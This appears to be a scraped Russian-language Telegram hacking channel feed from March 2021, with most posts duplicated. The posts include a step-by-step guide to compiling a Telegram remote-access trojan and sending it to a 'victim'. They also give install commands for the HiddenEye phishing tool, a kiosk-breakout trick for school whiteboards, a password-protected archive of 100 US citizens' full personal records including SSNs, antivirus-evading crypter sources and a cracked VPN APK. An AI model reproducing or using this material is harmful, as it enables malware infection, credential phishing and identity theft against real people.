Size: a a a
2021 March 26
Внедряем свой код в приложения
Frida — это набор инструментов, позволяющих внедрять собственный код в другие приложения. Утилита просто подключается к процессу и меняет его поведение. Frida умеет работать с приложениями, написанными для Windows, Linux, macOS, iOS и даже QNX.
Установка:
$
Более подробно об использовании утилиты можно прочитать на официальной странице GitHub репозитория.
Black Hat - Только лучшее!
Frida — это набор инструментов, позволяющих внедрять собственный код в другие приложения. Утилита просто подключается к процессу и меняет его поведение. Frida умеет работать с приложениями, написанными для Windows, Linux, macOS, iOS и даже QNX.
Установка:
$
pip install frida-toolsБолее подробно об использовании утилиты можно прочитать на официальной странице GitHub репозитория.
Black Hat - Только лучшее!
Создаем и распространяем вирус в Telegram
Хотел бы вам сегодня рассказать, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux.
Для начала обновляем пакеты:
Осталось только скомпилировать данный файл:
После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве. Если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram.
Хотел бы вам сегодня рассказать, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux.
Для начала обновляем пакеты:
apt update && apt upgrade
Устанавливаем все необходимые библиотеки:apt install python3 python3-pip
pip3 install pyinstaller
pip3 install pytelegrambotapi opencv-python cryptography
pip3 install comtypes pywin32 pyaudio pillow pycaw
Клонируем инструмент с репозитория GitHub:git clone https://github.com/Bainky/Telegram-RAT
Далее переходим в директорию инструмента:cd Telegram-RAT
Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота.Осталось только скомпилировать данный файл:
pyinstaller --onefile --noconsole RAT.py
Почти всё!После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве. Если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram.
Взлом интерактивной доски Irbis
Айо, подписоны. Для тех кто не в теме - Irbis это наиболее массовая интерактивная доска, которая используется в подавляющем большинстве российских школ и ВУЗов. Перед вами простейший гайд, который позволить открыть рабочий стол на доске и заниматься своими делами.
1. Надеваем рюкзачок и идем на урок;
2. Получаем доступ к электронной доске и совершаем вход без авторизации;
3. Нажимаем сочетание клавиш CTRL + ALT + DELETE;
4. Выбираем "Диспетчер задач", в нем "Файл" -> "Запустить новую задачу", после чего пишем: "
5. После того как закрыли "Диспетчер", на панели задач Windows нажимаем ПКМ по программе интерактивной доски, и закрываем её;
6. Готово!
Поздравляю, теперь вы самый крутой пацан в своем классе можете заниматься на уроке чем-нибудь действительным интересным 😎😎😎
Айо, подписоны. Для тех кто не в теме - Irbis это наиболее массовая интерактивная доска, которая используется в подавляющем большинстве российских школ и ВУЗов. Перед вами простейший гайд, который позволить открыть рабочий стол на доске и заниматься своими делами.
1. Надеваем рюкзачок и идем на урок;
2. Получаем доступ к электронной доске и совершаем вход без авторизации;
3. Нажимаем сочетание клавиш CTRL + ALT + DELETE;
4. Выбираем "Диспетчер задач", в нем "Файл" -> "Запустить новую задачу", после чего пишем: "
explorer";5. После того как закрыли "Диспетчер", на панели задач Windows нажимаем ПКМ по программе интерактивной доски, и закрываем её;
6. Готово!
Поздравляю, теперь вы самый крутой пацан в своем классе можете заниматься на уроке чем-нибудь действительным интересным 😎😎😎
Критическая уязвимость в Cisco Jabber позволяет удаленно взломать системы
Специалисты компании Cisco выпустили обновления программного обеспечения, устраняющее множественные уязвимости в клиентах обмена сообщениями Jabber для операционных систем Windows, macOS, Android и iOS.
Эксплуатация уязвимостей позволяет злоумышленнику запускать произвольные программы на базовой операционной системе с повышенными привилегиями, получать доступ к конфиденциальной информации, перехватывать контроль над защищенным сетевым трафиком или вызывать состояние «отказа в обслуживании» (DoS).
В общей сложности было исправлено пять уязвимостей, о трех из которых (CVE-2021-1411, CVE-2021-1417 и CVE-2021-1418) сообщил компании исследователь Олав Сортланд Торесен (Olav Sortland Thoresen) из Watchcom, а две другие (CVE -2021-1469 и CVE-2021-1471) были выявлены во время внутреннего тестирования безопасности.
Проблемы не зависят друг от друга, и использование одной из уязвимостей не связано с эксплуатацией другой. Для эксплуатации проблем злоумышленник должен пройти аутентификацию на сервере XMPP, на котором запущено уязвимое программное обеспечение, а также иметь возможность отправлять сообщения XMPP.
@ShadowCasher
Специалисты компании Cisco выпустили обновления программного обеспечения, устраняющее множественные уязвимости в клиентах обмена сообщениями Jabber для операционных систем Windows, macOS, Android и iOS.
Эксплуатация уязвимостей позволяет злоумышленнику запускать произвольные программы на базовой операционной системе с повышенными привилегиями, получать доступ к конфиденциальной информации, перехватывать контроль над защищенным сетевым трафиком или вызывать состояние «отказа в обслуживании» (DoS).
В общей сложности было исправлено пять уязвимостей, о трех из которых (CVE-2021-1411, CVE-2021-1417 и CVE-2021-1418) сообщил компании исследователь Олав Сортланд Торесен (Olav Sortland Thoresen) из Watchcom, а две другие (CVE -2021-1469 и CVE-2021-1471) были выявлены во время внутреннего тестирования безопасности.
Проблемы не зависят друг от друга, и использование одной из уязвимостей не связано с эксплуатацией другой. Для эксплуатации проблем злоумышленник должен пройти аутентификацию на сервере XMPP, на котором запущено уязвимое программное обеспечение, а также иметь возможность отправлять сообщения XMPP.
@ShadowCasher
2021 March 27
HiddenEye-Legacy - лучшая анонимная фишинг утилита
HiddenEye-Legacy - это современная фишинг утилита с расширенными возможностями и несколькими службами тунелирования. Инстремент позволяет выбрать вектор работы например Facebook, Instagram, Twitch, Steam, Vk, Spotify. Всего можно выбрать 34 режима работы инструмента.
Установка:
$
$
Black Hat - Только лучшее!
HiddenEye-Legacy - это современная фишинг утилита с расширенными возможностями и несколькими службами тунелирования. Инстремент позволяет выбрать вектор работы например Facebook, Instagram, Twitch, Steam, Vk, Spotify. Всего можно выбрать 34 режима работы инструмента.
Установка:
$
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
$ chmod 777 HiddenEye
$ pip install -r requirements.txt
$ cd HiddenEye
Использование:$
python HiddenEye.py
Более подробно об использовании утилиты можно прочитать на официальной странице GitHub репозитория.Black Hat - Только лучшее!
Шифруем текстовый файл
Сегодня мы разберемся, как зашифровать содержимое текстового файла с помощью Cloakify Factory.
◽Установка:
◾
◾
◾
◽Запуск:
◾
◽Процесс:
Перед нами откроется меню инструмента, в котором мы выбираем Cloakify a File (цифра 1). Далее указываем файл, который нужно зашифровать, и выбираем шифр. В результате будет создан файл с зашифрованным содержимым.
Для того, чтобы расшифровать файл, заходим в меню инструмента и выбираем Decloakify a File (цифра 2). А после повторяем все те же действия, которые описаны выше.
Сегодня мы разберемся, как зашифровать содержимое текстового файла с помощью Cloakify Factory.
◽Установка:
◾
apt update && apt upgrade◾
git clone https://github.com/termux-one/Cloakify.git◾
cd Cloakify/◽Запуск:
◾
python cloakifyFactory.py◽Процесс:
Перед нами откроется меню инструмента, в котором мы выбираем Cloakify a File (цифра 1). Далее указываем файл, который нужно зашифровать, и выбираем шифр. В результате будет создан файл с зашифрованным содержимым.
Для того, чтобы расшифровать файл, заходим в меню инструмента и выбираем Decloakify a File (цифра 2). А после повторяем все те же действия, которые описаны выше.
Зачем нужна анонимность и как её достичь?!
Данная книга не имеет афишированного автора. Единственные данные о которые нам известны – это сайт, адрес почтового ящика и BTC кошелёк.
Настоятельно рекомендую к прочтению!
🗃 Dark Arena - только лучшее!
Данная книга не имеет афишированного автора. Единственные данные о которые нам известны – это сайт, адрес почтового ящика и BTC кошелёк.
Настоятельно рекомендую к прочтению!
🗃 Dark Arena - только лучшее!
#database
100 фулок USA
Данный архив содержит в себе 100 строк с полными данными (fname, lname, ssn, dob и т.д) граждан США.
Пароль: @ShadowCasher
100 фулок USA
Данный архив содержит в себе 100 строк с полными данными (fname, lname, ssn, dob и т.д) граждан США.
Пароль: @ShadowCasher
Архив для написания криптора на VB и на C# (Crypter Sources)
В архиве содержится:
Примеры крипторов на VB и на C#
Примеры кода платных крипторов
Примеры кода для скрытия скантайм детектов
Примеры стабов(небольшая программа, "сердце" криптора, которая отвечает за запуск шифрованного файла, антиэмуляцию и прочие плюшки.)
Примеры шифровании файлов и конвертирования файлов
Мануал как очистить стаб
Разные примеры алгоритма работы криптора
Pump примеры и многое другое..
В архиве содержится:
Примеры крипторов на VB и на C#
Примеры кода платных крипторов
Примеры кода для скрытия скантайм детектов
Примеры стабов(небольшая программа, "сердце" криптора, которая отвечает за запуск шифрованного файла, антиэмуляцию и прочие плюшки.)
Примеры шифровании файлов и конвертирования файлов
Мануал как очистить стаб
Разные примеры алгоритма работы криптора
Pump примеры и многое другое..
Как восстановить переписку ВКонтакте, если её удалили и вы, и ваш собеседник
ВК позволяет скачивать архив со своими данными: файлами, фото, сообщениями и другими. За какой период — неизвестно, потому что функцию только тестируют. У кого-то хранятся переписки двухлетней давности, у кого-то только месячной.
Читать
ВК позволяет скачивать архив со своими данными: файлами, фото, сообщениями и другими. За какой период — неизвестно, потому что функцию только тестируют. У кого-то хранятся переписки двухлетней давности, у кого-то только месячной.
Читать
‼️Cloudflare VPN v6.5 WARP+‼️
💫 Обновление
💡 CloudFlare VPN ускорит интернет на вашем Android устройстве и сделает его безопаснее. Так же помогает ходить по заблокированным сайтам и имеет передовую технологию DNS Over TLS и DNS Over HTTPS.
⚙️ Полезное приложение на Android от популярного CDN-провайдера Cloudflare. Оно поможет обезопасить ваши данные, передаваемые по сети. Помимо этого, в 1.1.1. 1 присутствует подключение к VPN-серверу, поэтому беспокоиться за сохранность и неприкосновенность вашей информации можно больше не беспокоиться. Кроме всего прочего, благодаря данному приложению вы сможете обойти региональные и национальные блокировки сайтов. Сделайте свой интернет приватным в любом месте и в любое время вместе с 1.1.1. 1.
✅ Рекомендую. Более 10 миллионов загрузок.
Google Play link
🔑 Разблокирован безлимитный WARP трафик.
#Безопасность @FreeApkexe
💫 Обновление
💡 CloudFlare VPN ускорит интернет на вашем Android устройстве и сделает его безопаснее. Так же помогает ходить по заблокированным сайтам и имеет передовую технологию DNS Over TLS и DNS Over HTTPS.
⚙️ Полезное приложение на Android от популярного CDN-провайдера Cloudflare. Оно поможет обезопасить ваши данные, передаваемые по сети. Помимо этого, в 1.1.1. 1 присутствует подключение к VPN-серверу, поэтому беспокоиться за сохранность и неприкосновенность вашей информации можно больше не беспокоиться. Кроме всего прочего, благодаря данному приложению вы сможете обойти региональные и национальные блокировки сайтов. Сделайте свой интернет приватным в любом месте и в любое время вместе с 1.1.1. 1.
✅ Рекомендую. Более 10 миллионов загрузок.
Google Play link
🔑 Разблокирован безлимитный WARP трафик.
#Безопасность @FreeApkexe